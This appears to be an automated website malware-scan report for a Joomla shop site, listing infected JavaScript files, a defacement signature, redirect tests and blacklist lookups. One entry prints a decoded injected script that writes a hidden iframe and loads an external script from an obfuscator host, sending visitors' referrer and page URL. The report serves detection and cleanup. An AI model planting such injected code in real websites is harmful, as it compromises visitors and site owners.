Scanned pages/files
Request | Server response | Status |
http://brocantic.net/ | 200 OK Content-Length: 169992 Content-Type: text/html | suspicious |
Defacement / content modification. The following signature was found: !--Hacked by -- <!--Hacked by -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="" /> ...[209066 bytes skipped]... | ||
http://brocantic.net/media/system/js/caption.js | 200 OK Content-Length: 3307 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). File excerpt (truncated): var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = [...] Antivirus reports:
| ||
http://brocantic.net//modules/mod_ccnewsletter/assets/highslide-with-html.js/ | 404 Not Found Content-Length: 959 Content-Type: text/html | clean |
http://brocantic.net/test404page.js | 404 Not Found Content-Length: 959 Content-Type: text/html | clean |
http://brocantic.net/templates/ja_larix/scripts/ja.script.js | 200 OK Content-Length: 7330 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). File excerpt (truncated): window.addEvent('domready', function(){ var vm_inputs = getElementsByClass ("addtocart_button", null, "INPUT"); var vm_inputs1 = getElementsByClass ("addtocart_button_module", null, "INPUT"); if ((!vm_inputs || !vm_inputs.length) && (!vm_inputs1 || !vm_inputs1.length)) return; for (var i=0; i<vm_inputs.length; i++) { var vm_input = vm_inputs[i]; vm_input.value = ""; } if (!vm_inputs1 || !vm_inputs1.length) return; for (var i= [...] Antivirus reports:
| ||
http://brocantic.net/templates/ja_larix/ja_menus/ja_cssmenu/ja.cssmenu.js | 200 OK Content-Length: 2744 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). File excerpt (truncated): sfHover = function() { var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li"); for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { clearTimeout(this.timer); if(this.className.indexOf("sfhover") == -1) this.className+="sfhover"; } sfEls[i].onmouseout=function() { this.timer = setTimeout(sfHoverOut.bind(this), 20); } } } function sfHoverOut() { clearTimeout(this.timer); [...]
Decoded script: function () { var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li"); for (var i = 0; i < sfEls.length; ++i) { sfEls[i].onmouseover = function () {clearTimeout(this.timer);if (this.className.indexOf("sfhover") == -1) {this.className += "sfhover";}}; sfEls[i].onmouseout = function () {this.timer = setTimeout(sfHoverOut.bind(this), 20);}; } } var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%2 [...] I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescape(_escape));
Note: in the decoded script, the statements that follow the menu hover handler appear to be the injected part. The visible prefix of the URL-encoded _escape string decodes to a script that writes an iframe, and the string is passed to document.write(unescape(...)). The object I00 has its src set to api.obfuscatorjavascript.com with the visitor's referrer and the page URL as parameters, and is appended to the document head.
Antivirus reports:
| ||
http://www.brocantic.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js/mootools&file[1]=mootools-release-1.11.js&subdir[2]=/js/mootools&file[2]=mooPrompt.js | 200 OK Content-Length: 58597 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). File excerpt (truncated): function loadNewPage( el, url ) { var theEl = $(el); var callback = { success : function(responseText) { theEl.innerHTML = responseText; if( Lightbox ) Lightbox.init(); } } var opt = { method: 'get', onComplete: callback.success } new Ajax( url + '&only_page=1', opt ).request(); } function handleGoToCart() { document.location = live_site + '/index.php?option=com_virtuemart&page=shop.cart& [...] Antivirus reports:
| ||
http://brocantic.net/modules/mod_ja_vmproductslide/ja_vmproductslide/ja.vmproductslide.js | 200 OK Content-Length: 7727 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). File excerpt (truncated): var JS_Slider = new Class({ initialize: function(options) { this.element = this.element || null; this.options = Object.extend({ w: 100, h: 200, num_elem: 4, total: 0, url: '', mode: 'horizontal', direction: 'right', wrapper: 'ja-slide-wrapper', duration: 1000, interval: 3000, auto: 1 },options||{}); [...] Antivirus reports:
| ||
http://brocantic.net/templates/ja_larix/scripts/vm_stuff.js | 200 OK Content-Length: 2288 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). File excerpt (truncated): <!-- feature_block = document.getElementById('ja-feature'); if (feature_block) { anchors_feature = feature_block.getElementsByTagName('a'); for (i = 0; i<anchors_feature.length; ++i) { if (anchors_feature[i].title.indexOf("Add to Cart") != -1) { anchors_feature[i].className = "addtocart"; } } } carts = document.getElementsByName('addtocart'); if (carts.length) { for (i = 0; i<carts.length; ++i) { carti = [...] Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brocantic.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 Jan 2015 10:07:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 15 Jan 2015 10:07:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: analytics=true; expires=Fri, 15-Jan-2016 10:07:26 GMT; path=/
Set-Cookie: 32b3ca9cf32810a0be2283fe33d67d1f=s9sukp01guk4lbg4ku3k4o6g00; path=/
Set-Cookie: virtuemart=s9sukp01guk4lbg4ku3k4o6g00
Set-Cookie: ja_larix_tpl=ja_larix; expires=Tue, 05-Jan-2016 10:07:26 GMT; path=/
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: brocantic.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 Jan 2015 10:07:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 15 Jan 2015 10:07:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: analytics=true; expires=Fri, 15-Jan-2016 10:07:26 GMT; path=/
Set-Cookie: 32b3ca9cf32810a0be2283fe33d67d1f=s9sukp01guk4lbg4ku3k4o6g00; path=/
Set-Cookie: virtuemart=s9sukp01guk4lbg4ku3k4o6g00
Set-Cookie: ja_larix_tpl=ja_larix; expires=Tue, 05-Jan-2016 10:07:26 GMT; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: brocantic.net
Referer: http://www.google.com/search?q=brocantic.net
Result:
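The result is similar to the first query. No suspicious redirects were found. Note that only the Referer header differs between the two queries, so a redirect conditioned on something else (for example the User-Agent, the client IP address or a cookie) would not show up in this comparison.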
GET / HTTP/1.1
Host: brocantic.net
Referer: http://www.google.com/search?q=brocantic.net
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brocantic.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brocantic.net/
Result: brocantic.net is not infected or malware details are not published yet.
Result: brocantic.net is not infected or malware details are not published yet.